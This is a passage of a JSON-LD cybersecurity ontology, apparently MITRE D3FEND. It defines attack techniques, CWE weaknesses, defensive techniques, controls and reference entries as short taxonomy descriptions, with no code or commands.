      "d3f:attack-id": "T1654",
      "d3f:definition": "Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).",
      "rdfs:label": "Log Enumeration",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:ScheduledJobStartEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating the execution of a scheduled task, triggered either automatically by the scheduler or manually by a user.",
      "rdfs:label": "Scheduled Job Start Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ScheduledJobEvent"
        },
        {
          "@id": "_:N0a9d34f7cf66477a909824f323d9a3fe"
        }
      ]
    },
    {
      "@id": "_:N0a9d34f7cf66477a909824f323d9a3fe",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJobCreationEvent"
      }
    },
    {
      "@id": "d3f:dependent",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x dependent y: A dependent y is an entity that requires the fulfillment of the requirements specified in dependency x.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00729216-a"
      },
      "rdfs:label": "dependent",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:PacketCaptureFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:NetworkPacket"
      },
      "d3f:definition": "A file which contains raw representations of collected packets.",
      "rdfs:label": "Packet Capture File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "_:Nf2ec8b17caa84c14b07c958bef2d9ec5"
        }
      ]
    },
    {
      "@id": "_:Nf2ec8b17caa84c14b07c958bef2d9ec5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkPacket"
      }
    },
    {
      "@id": "d3f:CWE-1177",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1177",
      "d3f:definition": "The product uses a function, library, or third party component that has been explicitly prohibited, whether by the developer or the customer.",
      "rdfs:label": "Use of Prohibited Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:T1562.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.004",
      "d3f:definition": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.",
      "d3f:modifies": {
        "@id": "d3f:SystemFirewallConfiguration"
      },
      "rdfs:label": "Disable or Modify System Firewall",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:N2693cb4a4e7544aca543ef788c99f131"
        }
      ]
    },
    {
      "@id": "_:N2693cb4a4e7544aca543ef788c99f131",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemFirewallConfiguration"
      }
    },
    {
      "@id": "d3f:Vulnerability",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Vulnerability is a publicly disclosed instance of one or more weaknesses in a product that an attacker could exploit, violating its confidentiality, integrity, or availability.",
      "rdfs:label": "Vulnerability",
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:CWE-1063",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1063",
      "d3f:definition": "A static code block creates an instance of a class.",
      "rdfs:label": "Creation of Class Instance within a Static Code Block",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1176"
      }
    },
    {
      "@id": "d3f:ArchiveFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An archive file is a file that is composed of one or more computer files along with metadata. Archive files are used to collect multiple data files together into a single file for easier portability and storage, or simply to compress files to use less storage space. Archive files often store directory structures, error detection and correction information, arbitrary comments, and sometimes use built-in encryption.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Archive_file"
      },
      "rdfs:label": "Archive File",
      "rdfs:subClassOf": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:IntervalEstimation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-IE",
      "d3f:definition": "Interval estimation is the use of sample data to estimate an interval of possible values of a parameter of interest.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Interval estimation. [Link](https://en.wikipedia.org/wiki/Interval_estimation)",
      "rdfs:label": "Interval Estimation",
      "rdfs:subClassOf": {
        "@id": "d3f:Estimation"
      }
    },
    {
      "@id": "d3f:WindowsNtSetThreadContext",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtSetThreadContext",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPISetThreadContext"
      }
    },
    {
      "@id": "d3f:DirectoryService",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, directory service or name service maps the names of network resources to their respective network addresses. It is a shared information infrastructure for locating, managing, administering and organizing everyday items and network resources, which can include volumes, folders, files, printers, users, groups, devices, telephone numbers and other objects. A directory service is a critical component of a network operating system. A directory server or name server is a server which provides such a service. Each resource on the network is considered an object by the directory server. Information about a particular resource is stored as a collection of attributes associated with that resource or object.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Directory_service"
      },
      "rdfs:label": "Directory Service",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkService"
      }
    },
    {
      "@id": "d3f:LM-0001",
      "@type": "owl:Class",
      "d3f:attack-id": "LM-0001",
      "d3f:definition": "The adversary pivots through the host–payload boundary to reach additional subsystems. Hosted payloads exchange power, time, housekeeping, and data with the bus via defined gateways (e.g., SpaceWire, 1553, Ethernet) and often support file services, table loads, and command dictionaries distinct from the host’s. A foothold on the payload can be used to inject traffic through the gateway processor, request privileged services (time/ephemeris distribution, firmware loads), or ride shared backplanes where payload traffic is bridged into C&DH networks. In some designs, payload processes execute on host compute or expose maintenance modes that temporarily widen access, creating paths from the payload into attitude, power, storage, or recorder resources. The movement is transitive: compromise a co-resident unit, then traverse the trusted interface that already exists for mission operations.",
      "rdfs:label": "Hosted Payload - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/LM-0001/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTALateralMovementTechnique"
      },
      "skos:prefLabel": "Hosted Payload"
    },
    {
      "@id": "d3f:SoftwareUpdate",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SoftwareUpdate"
      ],
      "d3f:d3fend-id": "D3-SU",
      "d3f:definition": "Replacing old software on a computer system component.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodAndSystemForProvidingSoftwareUpdatesToLocalMachines"
      },
      "d3f:updates": {
        "@id": "d3f:Software"
      },
      "rdfs:label": "Software Update",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:Nfcfdf3802f9c48978141ec0f9b909a06"
        }
      ]
    },
    {
      "@id": "_:Nfcfdf3802f9c48978141ec0f9b909a06",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:updates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:T1218.013",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1218.013",
      "d3f:definition": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)",
      "d3f:invokes": {
        "@id": "d3f:CreateThread"
      },
      "d3f:modifies": {
        "@id": "d3f:ProcessSegment"
      },
      "rdfs:label": "Mavinject",
      "rdfs:seeAlso": {
        "@id": "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1218"
        },
        {
          "@id": "_:Nfcfa0fe1902a404082e7b888d92466a7"
        },
        {
          "@id": "_:N933940ddcbca4567a6b4650c847b1061"
        }
      ]
    },
    {
      "@id": "_:Nfcfa0fe1902a404082e7b888d92466a7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateThread"
      }
    },
    {
      "@id": "_:N933940ddcbca4567a6b4650c847b1061",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:CWE-426",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-426",
      "d3f:definition": "The product searches for critical resources using an externally-supplied search path that can point to resources that are not under the product's direct control.",
      "d3f:synonym": "Untrusted Path",
      "rdfs:label": "Untrusted Search Path",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-642"
        },
        {
          "@id": "d3f:CWE-673"
        }
      ]
    },
    {
      "@id": "d3f:M1051",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:SoftwareUpdate"
      },
      "rdfs:label": "Update Software"
    },
    {
      "@id": "d3f:DatabaseApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A database application is a computer program whose primary purpose is retrieving information from a computerized database.",
      "d3f:synonym": "Database Management System (DBMS)",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Database_application"
      },
      "rdfs:label": "Database Application",
      "rdfs:subClassOf": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:Reference-Remembranceofdatapassed:Astudyofdisksanitizationpractices",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.researchgate.net/profile/Simson-Garfinkel/publication/3437324_Remembrance_of_data_passed_A_study_of_disk_sanitization_practices/links/550de6d40cf2128741677d9f/Remembrance-of-data-passed-A-study-of-disk-sanitization-practices.pdf"
      },
      "d3f:kb-author": "Simson L Garfinkel, Abhi Shelat",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DiskErasure"
        },
        {
          "@id": "d3f:DiskFormatting"
        },
        {
          "@id": "d3f:DiskPartitioning"
        }
      ],
      "d3f:kb-reference-title": "Remembrance of Data Passed: A Study of Disk Sanitization Practices",
      "rdfs:label": "Reference - Remembrance of data passed: A study of disk sanitization practices"
    },
    {
      "@id": "d3f:InboundInternetMailTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Inbound internet mail traffic is network traffic that is: (a) coming from a host outside a given network via an incoming connection to a host inside that same network, and (b) using a standard protocol for email.",
      "rdfs:label": "Inbound Internet Mail Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InboundInternetNetworkTraffic"
        },
        {
          "@id": "d3f:InboundNetworkTraffic"
        },
        {
          "@id": "d3f:MailNetworkTraffic"
        }
      ]
    },
    {
      "@id": "d3f:available",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Date that the resource became or will become available.",
      "rdfs:label": {
        "@language": "en",
        "@value": "date available"
      },
      "rdfs:range": {
        "@id": "xsd:dateTime"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:date"
      }
    },
    {
      "@id": "d3f:DecoderApplication",
      "@type": "owl:Class",
      "d3f:definition": "An application that decodes digital data.",
      "rdfs:label": "Decoder Application",
      "rdfs:subClassOf": {
        "@id": "d3f:CodecApplication"
      }
    },
    {
      "@id": "d3f:Server",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a server is a piece of computer hardware or software (computer program) that provides functionality for other programs or devices, called \"clients\". This architecture is called the client-server model. Servers can provide various functionalities, often called \"services\", such as sharing data or resources among multiple clients, or performing computation for a client. A single server can serve multiple clients, and a single client can use multiple servers. A client process may run on the same device or may connect over a network to a server on a different device. Typical servers are database servers, file servers, mail servers, print servers, web servers, game servers, and application servers.",
      "d3f:manages": {
        "@id": "d3f:ServiceApplicationProcess"
      },
      "d3f:runs": {
        "@id": "d3f:ServiceApplication"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Server_(computing)"
      },
      "rdfs:label": "Server",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Host"
        },
        {
          "@id": "_:Nc44d7bc30031478d8c1631a9bae99229"
        },
        {
          "@id": "_:N6c1a03e974734bd1af1a6b9417aad2b7"
        }
      ]
    },
    {
      "@id": "_:Nc44d7bc30031478d8c1631a9bae99229",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceApplicationProcess"
      }
    },
    {
      "@id": "_:N6c1a03e974734bd1af1a6b9417aad2b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceApplication"
      }
    },
    {
      "@id": "d3f:T1161",
      "@type": "owl:Class",
      "d3f:attack-id": "T1161",
      "d3f:definition": "Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies (Citation: Writing Bad Malware for OSX). There are tools available to perform these changes. Any changes will invalidate digital signatures on binaries because the binary is being modified. Adversaries can remediate this issue by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time (Citation: Malware Persistence on OS X).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.006",
      "rdfs:label": "LC_LOAD_DYLIB Addition",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.006"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:CWE-610",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-610",
      "d3f:definition": "The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere.",
      "rdfs:label": "Externally Controlled Reference to a Resource in Another Sphere",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:OTTransportConfigurationCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Configure transport settings for a communication channel.",
      "rdfs:label": "OT Transport Configuration Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTNetworkManagementCommandEvent"
        },
        {
          "@id": "_:Nb5b91c4ac182442c8538ab9ddc60b200"
        }
      ]
    },
    {
      "@id": "_:Nb5b91c4ac182442c8538ab9ddc60b200",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTTransportConfigurationCommand"
      }
    },
    {
      "@id": "d3f:T1584.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1584.004",
      "d3f:definition": "Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control.(Citation: TrendMicro EarthLusca 2022) Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.",
      "rdfs:label": "Server",
      "rdfs:subClassOf": {
        "@id": "d3f:T1584"
      }
    },
    {
      "@id": "d3f:T1131",
      "@type": "owl:Class",
      "d3f:attack-id": "T1131",
      "d3f:definition": "Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.002",
      "rdfs:label": "Authentication Package",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:CCI-002531_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:Hardware-basedProcessIsolation"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements underlying hardware separation mechanisms to facilitate process separation.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002531"
    },
    {
      "@id": "d3f:FileGetAttributesEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file's metadata attributes, such as size, creation date, or type, are queried or retrieved without altering its content.",
      "rdfs:label": "File Get Attributes Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:N1e9d7e7e47ae49dc9a49b53a09694753"
        },
        {
          "@id": "_:Necb51c40082b449b9f31f395ebfeadba"
        }
      ]
    },
    {
      "@id": "_:N1e9d7e7e47ae49dc9a49b53a09694753",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileAccessEvent"
      }
    },
    {
      "@id": "_:Necb51c40082b449b9f31f395ebfeadba",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileCreationEvent"
      }
    },
    {
      "@id": "d3f:CWE-36",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-36",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize absolute path sequences such as \"/abs/path\" that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Absolute Path Traversal",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-22"
      }
    },
    {
      "@id": "d3f:CWE-120",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-120",
      "d3f:definition": "The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.",
      "d3f:synonym": [
        "Classic Buffer Overflow",
        "Unbounded Transfer"
      ],
      "rdfs:label": "Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-119"
        },
        {
          "@id": "d3f:CWE-787"
        }
      ]
    },
    {
      "@id": "d3f:identified-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x identified-by y: The entity x is recognized or described by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:identifies"
      },
      "rdfs:label": "identified-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:T1014",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1014",
      "d3f:definition": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)",
      "d3f:may-modify": [
        {
          "@id": "d3f:BootSector"
        },
        {
          "@id": "d3f:Firmware"
        },
        {
          "@id": "d3f:Kernel"
        },
        {
          "@id": "d3f:KernelModule"
        },
        {
          "@id": "d3f:SharedLibraryFile"
        }
      ],
      "rdfs:label": "Rootkit",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:N85970401bf1443ca829efb3638aac9ae"
        },
        {
          "@id": "_:Na6a0885a36f64955abd472cbbca47957"
        },
        {
          "@id": "_:N47b8954a10254145b9faf0dfe09b4d16"
        },
        {
          "@id": "_:Nb330abb774464939a39020970121a466"
        },
        {
          "@id": "_:N0bef1d13270c46a897d56b3f4de67da0"
        }
      ]
    },
    {
      "@id": "_:N85970401bf1443ca829efb3638aac9ae",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootSector"
      }
    },
    {
      "@id": "_:Na6a0885a36f64955abd472cbbca47957",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "_:N47b8954a10254145b9faf0dfe09b4d16",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Kernel"
      }
    },
    {
      "@id": "_:Nb330abb774464939a39020970121a466",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModule"
      }
    },
    {
      "@id": "_:N0bef1d13270c46a897d56b3f4de67da0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_19",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Validation of Metadata",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(19)"
    },
    {
      "@id": "d3f:MemoryAddressSpace",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:MemoryAddress"
      },
      "d3f:definition": "A memory address space is a space containing memory addresses.",
      "rdfs:label": "Memory Address Space",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AddressSpace"
        },
        {
          "@id": "_:N48217cb8f6fb4608b86c7b3ca7d723af"
        }
      ]
    },
    {
      "@id": "_:N48217cb8f6fb4608b86c7b3ca7d723af",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAddress"
      }
    },
    {
      "@id": "d3f:MultilayerPerceptronClassification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MPC",
      "d3f:definition": "A multilayer perceptron (MLP) is a fully connected class of feedforward artificial neural network (ANN). An MLP consists of at least three layers of nodes: an input layer, a hidden layer and an output layer.",
      "d3f:kb-article": "## References\nMultilayer perceptron. Wikipedia. [Link](https://en.wikipedia.org/wiki/Multilayer_perceptron).",
      "rdfs:label": "Multilayer Perceptron Classification",
      "rdfs:subClassOf": {
        "@id": "d3f:ArtificialNeuralNetClassification"
      }
    },
    {
      "@id": "d3f:ATTACKMobileLateralMovementTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0033"
      },
      "rdfs:label": "Lateral Movement Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:Ned5a6195858644ac84a5f15497799252"
        }
      ],
      "skos:prefLabel": "Lateral Movement Technique"
    },
    {
      "@id": "_:Ned5a6195858644ac84a5f15497799252",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0033"
      }
    },
    {
      "@id": "d3f:CWE-758",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-758",
      "d3f:definition": "The product uses an API function, data structure, or other entity in a way that relies on properties that are not always guaranteed to hold for that entity.",
      "rdfs:label": "Reliance on Undefined, Unspecified, or Implementation-Defined Behavior",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CWE-130",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-130",
      "d3f:definition": "The product parses a formatted message or structure, but it does not handle or incorrectly handles a length field that is inconsistent with the actual length of the associated data.",
      "d3f:synonym": [
        "length manipulation",
        "length tampering"
      ],
      "rdfs:label": "Improper Handling of Length Parameter Inconsistency",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-240"
      }
    },
    {
      "@id": "d3f:Reference-NullPointerChecking_SEI",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://wiki.sei.cmu.edu/confluence/display/c/EXP34-C.+Do+not+dereference+null+pointers"
      },
      "d3f:kb-organization": "Software Engineering Institute",
      "d3f:kb-reference-of": {
        "@id": "d3f:NullPointerChecking"
      },
      "d3f:kb-reference-title": "SEI CERT C Coding Standard",
      "rdfs:label": "Reference - Null Pointer Checking - SEI"
    },
    {
      "@id": "d3f:NetworkVulnerabilityAssessment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkVulnerabilityAssessment"
      ],
      "d3f:d3fend-id": "D3-NVA",
      "d3f:definition": "Network vulnerability assessment relates all the vulnerabilities of a network's components in the context of their configuration and interdependencies and can also include assessing risk emerging from the network's design as a whole, not just the sum of individual network node or network segment vulnerabilities.",
      "d3f:evaluates": {
        "@id": "d3f:Network"
      },
      "d3f:identifies": {
        "@id": "d3f:Vulnerability"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ReachabilityGraphBasedSafeRemediationsforSecuirytofOnPremiseAndCloudComputingEnvironments"
      },
      "rdfs:label": "Network Vulnerability Assessment",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkMapping"
        },
        {
          "@id": "_:N641cf5f9f9814416a22b27f3cf2587e0"
        },
        {
          "@id": "_:Nc63e4dc62b1449d08a31e2e6c95c71e9"
        }
      ]
    },
    {
      "@id": "_:N641cf5f9f9814416a22b27f3cf2587e0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:evaluates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Network"
      }
    },
    {
      "@id": "_:Nc63e4dc62b1449d08a31e2e6c95c71e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Vulnerability"
      }
    },
    {
      "@id": "d3f:Software-definedRadioComputer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Software-definedRadio"
      },
      "d3f:definition": "An embedded computer that includes a self-contained radio system, onboard compute (e.g., SoC/CPU/DSP/FPGA), and software/firmware sufficient to run waveforms and manage RF functions without requiring a continuously attached host PC. It typically exposes control and data via network or other external interfaces and may run an embedded OS.",
      "d3f:may-run": {
        "@id": "d3f:Real-timeOperatingSystem"
      },
      "d3f:runs": {
        "@id": "d3f:Software-definedRadioWaveformApplication"
      },
      "d3f:synonym": "Standalone SDR",
      "rdfs:label": "Software-Defined Radio Computer",
      "rdfs:seeAlso": {
        "@id": "https://satsearch.co/products/alenspace-totem-software-defined-radio-sdr"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEmbeddedComputer"
        },
        {
          "@id": "_:N35f71f1626bb471e82fdb281f8e0e5f8"
        },
        {
          "@id": "_:Nb7ce1e631c414f939659bf66ba00fb01"
        },
        {
          "@id": "_:N19ed2d99539243eea35c7a1eaa027b51"
        }
      ]
    },
    {
      "@id": "_:N35f71f1626bb471e82fdb281f8e0e5f8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadio"
      }
    },
    {
      "@id": "_:Nb7ce1e631c414f939659bf66ba00fb01",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-run"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Real-timeOperatingSystem"
      }
    },
    {
      "@id": "_:N19ed2d99539243eea35c7a1eaa027b51",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioWaveformApplication"
      }
    },
    {
      "@id": "d3f:may-contain",
      "@type": [
        "owl:ObjectProperty",
        "owl:TransitiveProperty"
      ],
      "d3f:definition": "to potentially have as contents or constituent parts; comprise; include.",
      "rdfs:label": "may-contain",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:SMBFileOverwriteIfEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is opened and truncated if it exists, or created otherwise. This operation combines destructive overwrite and creation behaviors.",
      "rdfs:label": "SMB File Overwrite If Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SMBEvent"
      }
    },
    {
      "@id": "d3f:may-be-evicted-by",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may be evicted by",
